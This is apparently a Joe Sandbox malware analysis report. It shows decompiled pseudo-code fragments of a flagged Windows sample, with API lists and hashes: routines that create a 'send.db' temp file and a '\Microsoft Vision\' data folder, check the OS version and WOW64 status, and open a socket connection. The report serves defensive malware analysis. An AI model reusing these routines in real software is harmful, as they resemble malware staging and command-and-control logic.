                                                                    • Opcode Fuzzy Hash: e20f0910a7123fcbfae48f8a427405ed3f7ff98b362518257ba180e182a4ae88
                                                                    • Instruction Fuzzy Hash: E5413831A0023CAEDF248B55E9663FCB7B4AB4174DF1448E5E645E4AC1E378CEC9CA94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 84%
                                                                    			E02D23273(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                    				char _v8;
                                                                    				signed int _v28;
                                                                    				char _v32;
                                                                    				short _v2080;
                                                                    				void* _t35;
                                                                    				void* _t37;
                                                                    
                                                                    				_t35 = __edx;
                                                                    				_t37 = __ecx;
                                                                    				E02D11052( &_v2080, 0, 0x400);
                                                                    				GetTempPathW(0x400,  &_v2080);
                                                                    				lstrcatW( &_v2080, L"send.db");
                                                                    				_t38 = _t37 + 4;
                                                                    				E02D13437(_t37 + 4, E02D135E5( &_v8,  &_v2080));
                                                                    				E02D15EA5(_v8);
                                                                    				_t8 =  &_v28;
                                                                    				_v28 = _v28 & 0x00000000;
                                                                    				asm("xorps xmm0, xmm0");
                                                                    				_v32 = 0x35;
                                                                    				asm("movups [ebp-0x14], xmm0");
                                                                    				E02D13679(E02D13761( &_v32, _t35, _t38),  *_t8, _a4);
                                                                    				E02D13665( &_v32);
                                                                    				return _a4;
                                                                    			}

                                                                    0x02d23273
                                                                    0x02d2328d
                                                                    0x02d2328f
                                                                    0x02d2329f
                                                                    0x02d232b1
                                                                    0x02d232bd
                                                                    0x02d232cc
                                                                    0x02d232d4
                                                                    0x02d232dc
                                                                    0x02d232dc
                                                                    0x02d232e3
                                                                    0x02d232e6
                                                                    0x02d232ee
                                                                    0x02d232f9
                                                                    0x02d23301
                                                                    0x02d2330c

                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000400,?), ref: 02D2329F
                                                                    • lstrcatW.KERNEL32(?,send.db), ref: 02D232B1
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                                                    • String ID: 5$send.db
                                                                    • API String ID: 891666058-2022884741
                                                                    • Opcode ID: ab76321da93bf50ec4c9cad4d8b86aee061194b1efcc1bd0095c46f3e774474d
                                                                    • Instruction ID: 4698abfe1b425656e7fa8fa40c6184728f6dc3fbcbe3b0e8f0e12362ce04ed1b
                                                                    • Opcode Fuzzy Hash: ab76321da93bf50ec4c9cad4d8b86aee061194b1efcc1bd0095c46f3e774474d
                                                                    • Instruction Fuzzy Hash: 1D015E71D4011CABDB10EB64EC45AEEB7BDEF50704F518065A505A2240EF749F5ACFE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 66%
                                                                    			E02D23702(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                    				char _v8;
                                                                    				char _v28;
                                                                    				char _v32;
                                                                    				short _v552;
                                                                    				void* _t34;
                                                                    
                                                                    				_t34 = __edx;
                                                                    				_v8 = 0;
                                                                    				E02D11052( &_v552, 0, 0x208);
                                                                    				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552);
                                                                    				lstrcatW( &_v552, L"\\Microsoft Vision\\");
                                                                    				E02D1346A( &_v8, _t34, 0,  &_v552);
                                                                    				_v32 = 0x3b;
                                                                    				asm("xorps xmm0, xmm0");
                                                                    				_v28 = 0;
                                                                    				asm("movups [ebp-0x14], xmm0");
                                                                    				E02D13679(E02D13761( &_v32, _t34,  &_v8), 0, _a4);
                                                                    				E02D13665( &_v32);
                                                                    				E02D15EA5(_v8);
                                                                    				return _a4;
                                                                    			}
                                                                    0x02d23702
                                                                    0x02d2371b
                                                                    0x02d2371e
                                                                    0x02d23732
                                                                    0x02d23744
                                                                    0x02d23754
                                                                    0x02d2375f
                                                                    0x02d23766
                                                                    0x02d23769
                                                                    0x02d23770
                                                                    0x02d2377b
                                                                    0x02d23783
                                                                    0x02d2378b
                                                                    0x02d23795

                                                                    APIs
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02D23732
                                                                    • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 02D23744
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FolderFreePathVirtuallstrcat
                                                                    • String ID: ;$\Microsoft Vision\
                                                                    • API String ID: 1529938272-253167065
                                                                    • Opcode ID: 4b46e224b2c9e08475310a363c6ee64ed77b4860a068c3a4b7217947acc35b2d
                                                                    • Instruction ID: e3bb0b2966157e33b34eaa8e8a3b8845e50965cebd3bda161e3c9db25ac9a237
                                                                    • Opcode Fuzzy Hash: 4b46e224b2c9e08475310a363c6ee64ed77b4860a068c3a4b7217947acc35b2d
                                                                    • Instruction Fuzzy Hash: D4011BB1C4011DBADB10EBA1E949DDFBBB9EF54304F104155A905A2240EB34AF58CFE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 58%
                                                                    			E02D1F4CE() {
                                                                    				intOrPtr _v6;
                                                                    				char _v288;
                                                                    				struct HINSTANCE__* _t4;
                                                                    				intOrPtr _t5;
                                                                    				_Unknown_base(*)()* _t9;
                                                                    
                                                                    				_v288 = 0x11c;
                                                                    				_t4 = LoadLibraryA("ntdll.dll");
                                                                    				if(_t4 == 0) {
                                                                    					L3:
                                                                    					_t5 = _v6;
                                                                    					if(_t5 == 2 || _t5 == 3) {
                                                                    						return 1;
                                                                    					} else {
                                                                    						goto L5;
                                                                    					}
                                                                    				} else {
                                                                    					_t9 = GetProcAddress(_t4, "RtlGetVersion");
                                                                    					if(_t9 == 0) {
                                                                    						L5:
                                                                    						return 0;
                                                                    					} else {
                                                                    						 *_t9( &_v288);
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    			}
                                                                    0x02d1f4dc
                                                                    0x02d1f4e6
                                                                    0x02d1f4ee
                                                                    0x02d1f509
                                                                    0x02d1f509
                                                                    0x02d1f50e
                                                                    0x02d1f51c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1f4f0
                                                                    0x02d1f4f6
                                                                    0x02d1f4fe
                                                                    0x02d1f514
                                                                    0x02d1f517
                                                                    0x02d1f500
                                                                    0x02d1f507
                                                                    0x00000000
                                                                    0x02d1f507
                                                                    0x02d1f4fe

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 02D1F4E6
                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 02D1F4F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RtlGetVersion$ntdll.dll
                                                                    • API String ID: 2574300362-1489217083
                                                                    • Opcode ID: d635637fd285660c3e5f8d3d0ef454dcca3d8f6f6aa761fbe352d250c15ca45e
                                                                    • Instruction ID: 8d2758dd2652eed7400528037868f1befd4b3f333ced4afaed785f66f858fb9e
                                                                    • Opcode Fuzzy Hash: d635637fd285660c3e5f8d3d0ef454dcca3d8f6f6aa761fbe352d250c15ca45e
                                                                    • Instruction Fuzzy Hash: 40E02271A8032C29EB34AF76BC0B6D73BA84B12208F4404509542E1B44DB60CD0ACAE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 58%
                                                                    			E02D1F51D() {
                                                                    				intOrPtr _v272;
                                                                    				intOrPtr _v284;
                                                                    				char _v288;
                                                                    				struct HINSTANCE__* _t5;
                                                                    				_Unknown_base(*)()* _t8;
                                                                    
                                                                    				_v288 = 0x11c;
                                                                    				_t5 = LoadLibraryA("ntdll.dll");
                                                                    				if(_t5 == 0) {
                                                                    					L3:
                                                                    					if(_v272 != 2) {
                                                                    						goto L5;
                                                                    					} else {
                                                                    						return _v284;
                                                                    					}
                                                                    				} else {
                                                                    					_t8 = GetProcAddress(_t5, "RtlGetVersion");
                                                                    					if(_t8 == 0) {
                                                                    						L5:
                                                                    						return 0;
                                                                    					} else {
                                                                    						 *_t8( &_v288);
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 02D1F535
                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 02D1F545
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RtlGetVersion$ntdll.dll
                                                                    • API String ID: 2574300362-1489217083
                                                                    • Opcode ID: b4722605b63cee9df40406986c3e4b04024f77cb72522ebd9f070afc721003db
                                                                    • Instruction ID: d4412d5ab6fea03802fab749c8628a4ec35b0de3aa6695ef81388ca9f33acb80
                                                                    • Opcode Fuzzy Hash: b4722605b63cee9df40406986c3e4b04024f77cb72522ebd9f070afc721003db
                                                                    • Instruction Fuzzy Hash: 14E01230A8032C9AEB34EF72FC0AAD677B85B61709F004594A606E1641DB74CD4DCED0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 40%
                                                                    			E02D20C36(intOrPtr* __ecx) {
                                                                    				signed int _v8;
                                                                    				_Unknown_base(*)()* _t6;
                                                                    				intOrPtr* _t12;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_v8 = _v8 & 0x00000000;
                                                                    				_t12 = __ecx;
                                                                    				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                                                    				if(_t6 != 0) {
                                                                    					 *_t6( *_t12,  &_v8);
                                                                    				}
                                                                    				return _v8;
                                                                    			}

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,02D1FC6D,?,?,02D12D84,?,02D24648,?,?,00000000,?), ref: 02D20C4B
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02D20C52
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: IsWow64Process$kernel32
                                                                    • API String ID: 1646373207-3789238822
                                                                    • Opcode ID: 23199801b96bcf498eeb6dfe6c00abf26e6308cf97dec73283d62cd74aaee1b1
                                                                    • Instruction ID: c611d2c46d6b5db2efecdad306b3674ab4d662bf753eb2d42b2d5df2fb2e04ea
                                                                    • Opcode Fuzzy Hash: 23199801b96bcf498eeb6dfe6c00abf26e6308cf97dec73283d62cd74aaee1b1
                                                                    • Instruction Fuzzy Hash: BBE08676540314FBEB20DBA1DC09A8B776CEF64259B104444B411A2300D774DE0CD790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E02D1D17D(signed int* __ecx, intOrPtr _a4) {
                                                                    				signed int _v8;
                                                                    				signed int _v12;
                                                                    				void* _t22;
                                                                    				void* _t23;
                                                                    				void* _t33;
                                                                    				struct _CRITICAL_SECTION* _t43;
                                                                    				signed int* _t59;
                                                                    				intOrPtr _t62;
                                                                    				void* _t66;
                                                                    
                                                                    				_t45 = __ecx;
                                                                    				_push(__ecx);
                                                                    				_push(__ecx);
                                                                    				_t59 = __ecx;
                                                                    				_t43 = __ecx + 0x3d8;
                                                                    				EnterCriticalSection(_t43);
                                                                    				_t67 = _t59[0x7b];
                                                                    				_t62 = _a4;
                                                                    				if(_t59[0x7b] != 0) {
                                                                    					L2:
                                                                    					_t69 = _t59[3];
                                                                    					if(_t59[3] != 0) {
                                                                    						L5:
                                                                    						_t63 =  &(_t59[0xf1]);
                                                                    						_t22 = E02D12190( &(_t59[0xf1]), 0);
                                                                    						__eflags = _t22;
                                                                    						if(_t22 == 0) {
                                                                    							E02D11F76(_t63);
                                                                    						}
                                                                    						_t23 = E02D12190( &(_t59[0xf3]), 0);
                                                                    						__eflags = _t23;
                                                                    						if(_t23 == 0) {
                                                                    							E02D11F76( &(_t59[0xf3]));
                                                                    						}
                                                                    						_v12 = _t59[4];
                                                                    						_v8 = _t59[0x7c];
                                                                    						E02D11F4B(_t63, E02D1D0A3,  &_v12);
                                                                    						E02D11F4B( &(_t59[0xf3]), E02D1D110,  &_v12);
                                                                    						 *_t59 = 1;
                                                                    						LeaveCriticalSection(_t43);
                                                                    						E02D12190( &(_t59[0xf1]), 0xffffffff);
                                                                    						E02D12190( &(_t59[0xf3]), 0xffffffff);
                                                                    						EnterCriticalSection(_t43);
                                                                    						 *_t59 =  *_t59 & 0x00000000;
                                                                    						LeaveCriticalSection(_t43);
                                                                    						E02D1D328(_t59);
                                                                    						_t33 = 0;
                                                                    						__eflags = 0;
                                                                    					} else {
                                                                    						E02D133F5(_t66, _t62);
                                                                    						if(E02D157FB( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) {
                                                                    							goto L5;
                                                                    						} else {
                                                                    							goto L4;
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					E02D133F5(_t66, _t62 + 8);
                                                                    					if(E02D157FB( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) {
                                                                    						L4:
                                                                    						LeaveCriticalSection(_t43);
                                                                    						_t33 = 1;
                                                                    					} else {
                                                                    						goto L2;
                                                                    					}
                                                                    				}
                                                                    				return _t33;
                                                                    			}

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 02D1D18E
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 02D1D1DD
                                                                      • Part of subcall function 02D133F5: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,02D12A97,?,?,00000000,exit,00000000,start), ref: 02D1341A
                                                                      • Part of subcall function 02D157FB: getaddrinfo.WS2_32(745D0770,00000000,02D14EA0,00000000), ref: 02D15848
                                                                      • Part of subcall function 02D157FB: socket.WS2_32(00000002,00000001,00000000), ref: 02D1585F
                                                                      • Part of subcall function 02D157FB: htons.WS2_32(00000000), ref: 02D15885
                                                                      • Part of subcall function 02D157FB: freeaddrinfo.WS2_32(00000000), ref: 02D15895
                                                                      • Part of subcall function 02D157FB: connect.WS2_32(?,?,00000010), ref: 02D158A1
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 02D1D261
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 02D1D27E
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 02D1D288
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                                                    • String ID:
                                                                    • API String ID: 4195813003-0
                                                                    • Opcode ID: 7daea5e846a5013abf04bdac95a12fdce0f12efe083f19e181778970066c7c49
                                                                    • Instruction ID: 1a46285d1bbacb7b291304c718d5263f3d6138f26ef98469704e35f56b69aae6
                                                                    • Opcode Fuzzy Hash: 7daea5e846a5013abf04bdac95a12fdce0f12efe083f19e181778970066c7c49
                                                                    • Instruction Fuzzy Hash: E031BB71600516BBE709EB70EC54FAAB7AEFF14310F504615E52992680EB70BD54CFB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: a16edf3c91191aa68e022936d977b1455e684d57e6da197037ec389aec64b2b4
                                                                    • Instruction ID: e47121bc920ff3f7ea77ed45393016d2120011e0314bd2c617fe874b5558f5bf
                                                                    • Opcode Fuzzy Hash: a16edf3c91191aa68e022936d977b1455e684d57e6da197037ec389aec64b2b4
                                                                    • Instruction Fuzzy Hash: 6CB1467190424AAFDB218F19C8817AFBBB1EF45314F1445BAE544BB3C2C23C9D91C7A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000), ref: 00402F28
                                                                    • FindResourceW.KERNEL32(00000000,?,00000006), ref: 00402F6E
                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 00402FD5
                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001), ref: 00403007
                                                                      • Part of subcall function 0040731A: RtlEnterCriticalSection.NTDLL(0054C004), ref: 00407325
                                                                      • Part of subcall function 0040731A: RtlLeaveCriticalSection.NTDLL(0054C004), ref: 00407351
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharCriticalFindMultiResourceSectionWide$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 2462052736-0
                                                                    • Opcode ID: 86cd49adf2e7b3b36c0f573bb7070bc4e31e72454729bce8d5d3bf8b9874ccc5
                                                                    • Instruction ID: c3cda8ed44ac57988993c33555f7e647619e1c5fd610c54cf0df41b08251db79
                                                                    • Opcode Fuzzy Hash: 86cd49adf2e7b3b36c0f573bb7070bc4e31e72454729bce8d5d3bf8b9874ccc5
                                                                    • Instruction Fuzzy Hash: 9951EF31600205AFE710DF29C848B2ABBE9EF84715F10417EF955EB3D5DB799A018B68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VarUI4FromStr.OLEAUT32(?,00000000,00000000,?), ref: 0040611E
                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 004061D0
                                                                    • RegCloseKey.ADVAPI32 ref: 00406208
                                                                      • Part of subcall function 0040AA43: _free.LIBCMT ref: 0040AA56
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?), ref: 004063C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Close$FromValue_free
                                                                    • String ID:
                                                                    • API String ID: 2478416592-0
                                                                    • Opcode ID: 4a75d6c256a12b52d26b5594e4c4df3c51f64240cfad6737815bc7a2d4af5771
                                                                    • Instruction ID: 783e4a32be8d04131a6d3b5aa6c25d0e8a5fdb5090801ca485d60173d56b3ea8
                                                                    • Opcode Fuzzy Hash: 4a75d6c256a12b52d26b5594e4c4df3c51f64240cfad6737815bc7a2d4af5771
                                                                    • Instruction Fuzzy Hash: 3A7141F1E002288BDB60DF15CD80B9AB7B9AF84304F0541EEEA0A77291DB745E94CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,80004005,?,?,00000000,00000000,?,?,?,?,?,80004005,?,80004005), ref: 00404E30
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,80004005,?,80004005,?,00000003,?,00000000), ref: 00404E41
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,80004005,00000000,00000000,00000000,00000000,?,?,?,?,?,80004005,?,80004005), ref: 00404E60
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,80004005,?,00000000,00000000,00000000,?,?,?,80004005,?,80004005,?,00000003), ref: 00404E8B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1717984340-0
                                                                    • Opcode ID: d6f31bbd231b6a6888e700c09dff859c0ac281d32c646bf8a3ea4c558b503ce0
                                                                    • Instruction ID: 007fd4862d0c4b9111d363751063929c5d67b2fe23cf5da8ca229cd0ef8e736b
                                                                    • Opcode Fuzzy Hash: d6f31bbd231b6a6888e700c09dff859c0ac281d32c646bf8a3ea4c558b503ce0
                                                                    • Instruction Fuzzy Hash: A04109B1640205BBEB205F65DC41FAB7B19FF40744F20413AFA05B92C0DB7AAD248BD9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1F69F(WCHAR** __ecx, intOrPtr* __edx) {
                                                                    				struct HRSRC__* _t13;
                                                                    				void* _t14;
                                                                    				unsigned int _t32;
                                                                    				intOrPtr* _t35;
                                                                    				struct HINSTANCE__* _t36;
                                                                    
                                                                    				_t35 = __edx;
                                                                    				_t36 = LoadLibraryExW( *__ecx, 0, 2);
                                                                    				if(_t36 == 0xffffffff) {
                                                                    					L4:
                                                                    					return 0;
                                                                    				}
                                                                    				_t13 = FindResourceW(_t36, 1, 0x10);
                                                                    				if(_t13 == 0) {
                                                                    					goto L4;
                                                                    				}
                                                                    				_t14 = LoadResource(_t36, _t13);
                                                                    				if(_t14 == 0) {
                                                                    					goto L4;
                                                                    				}
                                                                    				_t32 =  *(_t14 + 0x28);
                                                                    				 *_t35 =  *((intOrPtr*)(_t14 + 0x14));
                                                                    				 *((short*)(_t35 + 4)) =  *((intOrPtr*)(_t14 + 0x1a));
                                                                    				 *((short*)(_t35 + 6)) =  *((intOrPtr*)(_t14 + 0x18));
                                                                    				 *(_t35 + 8) = _t32 & 1;
                                                                    				 *(_t35 + 0xc) = _t32 >> 0x00000001 & 1;
